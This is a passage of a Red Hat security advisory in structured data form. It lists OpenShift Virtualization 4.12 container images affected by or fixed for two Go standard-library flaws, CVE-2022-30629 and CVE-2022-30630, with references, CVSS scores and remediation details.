"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30629", }, { category: "external", summary: "RHBZ#2092793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092793", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30629", url: "https://www.cve.org/CVERecord?id=CVE-2022-30629", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30629", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30629", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg", url: "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg", }, ], release_date: "2022-06-02T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 3.1, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "golang: crypto/tls: session tickets lack random ticket_age_add", }, { cve: "CVE-2022-30630", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107371", }, ], notes: [ { category: "description", text: "A flaw was found in the golang standard library, io/fs. Calling Glob on a path that contains a large number of path separators can cause a panic issue due to stack exhaustion. This could allow an attacker to impact availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: io/fs: stack exhaustion in Glob", title: "Vulnerability summary", }, { category: "other", text: "RH ProdSec has set the Impact of this vulnerability to Moderate as there is no known method to execute arbitary code. Successful exploitation of this bug can cause the application under attack to panic, merely causing a Denial of Service at the application level. As the kernel is unaffected by this bug, the user can merely relaunch the application to fix the problem. Also, if somehow the application keeps relaunching, the timer watchdogs in the default RHEL kernel will stop the attack in its tracks.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30630", }, { category: "external", summary: "RHBZ#2107371", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30630", url: "https://www.cve.org/CVERecord?id=CVE-2022-30630", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30630", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30630", }, { category: "external", summary: "https://go.dev/issue/53415", url: "https://go.dev/issue/53415", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: 